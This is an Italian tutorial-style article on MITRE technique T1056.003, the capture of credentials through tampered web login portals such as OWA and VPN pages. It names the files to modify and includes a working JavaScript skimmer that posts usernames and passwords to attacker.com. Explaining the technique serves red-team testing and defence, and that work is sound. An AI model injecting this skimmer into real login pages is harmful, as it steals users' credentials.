Cattura Credenziali dai Portali Web: Input Capture: Web Portal Capture (T1056.003)

La compromissione dei portali di autenticazione web rappresenta una delle tecniche più insidiose per il furto di credenziali aziendali. Gli attaccanti modificano il codice delle pagine di login esterne, come portali VPN o webmail, per catturare username e password prima che l'utente acceda legittimamente al servizio.

Questa tecnica si manifesta in due fasi critiche della kill chain: Credential Access (TA0006) quando l'obiettivo primario è rubare le credenziali, e Collection (TA0009) quando i dati raccolti vengono aggregati per successive operazioni. La pericolosità deriva dalla trasparenza dell'attacco: gli utenti completano normalmente il login mentre le loro credenziali vengono silenziosamente registrate.

I numeri parlano chiaro: 1 gruppo APT documentato, 2 malware specializzati e 2 campagne maggiori hanno sfruttato questa tecnica. L'impatto può essere devastante, considerando che un singolo portale compromesso può catturare credenziali di centinaia o migliaia di utenti.

Per testare la resilienza dei portali web aziendali, è fondamentale comprendere come gli attaccanti modificano le pagine di login. Il processo inizia tipicamente con l'accesso amministrativo al web server, ottenuto tramite exploit o credenziali compromesse.

Su un server IIS con Outlook Web Access, puoi iniettare codice JavaScript nella pagina di login principale:

notepad C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\logon.aspx

L'inserimento di uno script di cattura avviene prima del tag di chiusura del form:

<script>
document.getElementById('loginForm').addEventListener('submit', function() {
    var usr = document.getElementById('username').value;
    var pwd = document.getElementById('password').value;
    fetch('http://attacker.com/log', {method: 'POST', body: JSON.stringify({u:usr, p:pwd})});
});
</script>

Per ambienti Linux con portali VPN basati su Apache, la modifica target è spesso il file PHP di autenticazione:

vi /var/www/html/vpn/login.php

Il codice di intercettazione può essere inserito all'inizio della funzione di validazione credenziali, registrando i dati prima del controllo effettivo. IceApple utilizza proprio questa strategia per monitorare le richieste di autenticazione OWA.

La simulazione in laboratorio dovrebbe includere anche l'implementazione di web shell come WARPWIRE, che può catturare credenziali durante il processo di login web per accedere a servizi layer 7 come RDP. Questo approccio multi-livello riflette le tattiche osservate nella campagna Cutting Edge, dove gli attaccanti hanno modificato il JavaScript delle pagine di login Ivanti Connect Secure.

Vuoi diventare un Ethical Hacker ma non sai da dove iniziare?

Scarica la guida gratuita e segui il percorso corretto fin dal primo passo